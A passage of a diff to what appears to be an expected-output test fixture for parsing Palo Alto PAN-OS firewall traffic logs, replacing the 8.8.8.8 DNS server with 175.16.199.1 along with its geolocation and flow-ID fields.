"labels.nat_translated": true, - "log.offset": 34335, + "log.offset": 34775, "network.application": "dns", "network.bytes": 273, "network.community_id": [ - "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=", - "1:hwpLJFJeocCuki/uuS7DMUwYAcc=" + "1:G2nWQeko18fm7LG80vVA2C3krF4=", + "1:HivHFd76C8fGYRMgg2/dN+qo64I=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -8234,12 +8031,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24247", - "panw.panos.network.nat.community_id": "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=", + "panw.panos.network.nat.community_id": "1:G2nWQeko18fm7LG80vVA2C3krF4=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091186, "panw.panos.source.interface": "ethernet1/2", @@ -8254,14 +8051,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 202, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -8286,17 +8083,18 @@ "client.nat.port": 52939, "client.packets": 1, "client.port": 32296, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 195, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8310,7 +8108,7 @@ "event.end": "2018-11-30T16:09:15.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:15.000-02:00", "event.timezone": "-02:00", @@ -8322,12 +8120,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 34784, + "log.offset": 35234, "network.application": "dns", "network.bytes": 270, "network.community_id": [ - "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=", - "1:PL/uhiXbtv9YRtGDNEfmkWyMpEw=" + "1:PwRRWHkgbRmPTd6QdE3JdT1K2MI=", + "1:skBdPMEq89/IUuq3+XIkE66uttE=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -8344,12 +8142,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24098", - "panw.panos.network.nat.community_id": "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=", + "panw.panos.network.nat.community_id": "1:skBdPMEq89/IUuq3+XIkE66uttE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091187, "panw.panos.source.interface": "ethernet1/2", @@ -8364,14 +8162,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 195, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -8397,14 +8195,7 @@ "client.packets": 1, "client.port": 33870, "destination.address": "208.83.246.20", - "destination.as.number": 30303, - "destination.as.organization.name": "Ooma, Inc.", "destination.bytes": 90, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.83.246.20", "destination.nat.ip": "208.83.246.20", "destination.nat.port": 123, @@ -8432,7 +8223,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 35233, + "log.offset": 35693, "network.application": "ntp", "network.bytes": 180, "network.community_id": [ 
@@ -8506,17 +8297,18 @@ "client.nat.port": 19658, "client.packets": 2, "client.port": 54659, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 192, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 2, "destination.port": 53, 
@@ -8530,7 +8322,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -8541,12 +8333,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 35695, + "log.offset": 36155, "network.application": "dns", "network.bytes": 340, "network.community_id": [ - "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=", - "1:E2LqiKHR3ZQXGMA0QsH84jNNC/0=" + "1:ZXjKRdtLBmEkac907R8hepJQAgc=", + "1:x1R9iKG6gpfTr38oGDxd94TaJfw=" ], "network.direction": "outbound", "network.packets": 4, 
@@ -8563,12 +8355,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "drop-icmp", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24258", - "panw.panos.network.nat.community_id": "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=", + "panw.panos.network.nat.community_id": "1:x1R9iKG6gpfTr38oGDxd94TaJfw=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091189, "panw.panos.source.interface": "ethernet1/2", @@ -8583,14 +8375,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.196", - "8.8.8.8" + "192.168.15.196" ], "rule.name": "new_outbound_from_trust", "server.bytes": 192, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 2, "server.port": 53, 
@@ -8615,17 +8407,18 @@ "client.nat.port": 64352, "client.packets": 1, "client.port": 57446, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 208, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8639,7 +8432,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -8650,12 +8443,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 36149, + "log.offset": 36619, "network.application": "dns", "network.bytes": 291, "network.community_id": [ - "1:uPFYX4KL/wjyCp4kt+08v7myT3w=", - "1:wZXxVANJq0JID3j0Sh2o/qnIa7A=" + "1:8KNguHP76fjqnY2FMkcbeO9WBCk=", + "1:KACwzOgJLPdAmFb3AUQwHtScx8A=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -8672,12 +8465,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "reset-client", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24155", - "panw.panos.network.nat.community_id": "1:uPFYX4KL/wjyCp4kt+08v7myT3w=", + "panw.panos.network.nat.community_id": "1:KACwzOgJLPdAmFb3AUQwHtScx8A=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091190, "panw.panos.source.interface": "ethernet1/2", @@ -8692,14 +8485,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 208, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -8724,17 +8517,18 @@ "client.nat.port": 60126, "client.packets": 1, "client.port": 22655, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 100, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8748,7 +8542,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -8759,12 +8553,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 36605, + "log.offset": 37085, "network.application": "dns", "network.bytes": 184, "network.community_id": [ - "1:GzSDvCcBuprowvf40RNRaGTOn+A=", - "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=" + "1:S1I23bkB/fNp16aIx8LE9+qfQMI=", + "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -8781,12 +8575,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "reset-server", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24232", - "panw.panos.network.nat.community_id": "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=", + "panw.panos.network.nat.community_id": "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091191, "panw.panos.source.interface": "ethernet1/2", @@ -8801,14 +8595,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 100, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -8834,16 +8628,7 @@ "client.packets": 13, "client.port": 52509, "destination.address": "35.185.88.112", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 7237, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "35.185.88.112", "destination.nat.ip": "35.185.88.112", "destination.nat.port": 443, @@ -8870,7 +8655,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 37061, + "log.offset": 37551, "network.application": "ssl", "network.bytes": 9290, "network.community_id": [ 
@@ -8944,17 +8729,18 @@ "client.nat.port": 35748, "client.packets": 1, "client.port": 27192, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 109, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8968,7 +8754,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -8980,12 +8766,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 37565, + "log.offset": 38055, "network.application": "dns", "network.bytes": 202, "network.community_id": [ - "1:9Ub1pskil4C0tLo85OJa61g1D0Q=", - "1:SaW9SLCHEmuQYbHgbCLPVZmIrWo=" + "1:SqvoGARqG3vB8IQsDqwWVdoya4g=", + "1:zKOYj65ZfonGNEeED/C8WsAzNdo=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -9002,12 +8788,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "23960", - "panw.panos.network.nat.community_id": "1:9Ub1pskil4C0tLo85OJa61g1D0Q=", + "panw.panos.network.nat.community_id": "1:zKOYj65ZfonGNEeED/C8WsAzNdo=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091193, "panw.panos.source.interface": "ethernet1/2", @@ -9022,14 +8808,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 109, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -9054,17 +8840,18 @@ "client.nat.port": 63701, "client.packets": 1, "client.port": 30221, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 116, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -9078,7 +8865,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -9090,12 +8877,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 38014, + "log.offset": 38514, "network.application": "dns", "network.bytes": 200, "network.community_id": [ - "1:UKGEn5x2xKPJhb0aLNUd3IM2xP0=", - "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=" + "1:BnKHQDJv1OGtE9i+aGd3gRM75p8=", + "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -9112,12 +8899,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24236", - "panw.panos.network.nat.community_id": "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=", + "panw.panos.network.nat.community_id": "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091194, "panw.panos.source.interface": "ethernet1/2", @@ -9132,14 +8919,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 116, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -9164,17 +8951,18 @@ "client.nat.port": 57872, "client.packets": 1, "client.port": 30570, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 96, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -9188,7 +8976,7 @@ "event.end": "2018-11-30T16:09:16.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:16.000-02:00", "event.timezone": "-02:00", @@ -9200,12 +8988,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 38463, + "log.offset": 38973, "network.application": "dns", "network.bytes": 160, "network.community_id": [ - "1:7WDGZhY7X3GTZLGCIDWzxK5juF4=", - "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=" + "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=", + "1:rLkKmC5eKNwFkylsF3ox4VOALUI=" ], "network.direction": "outbound", "network.packets": 2, 
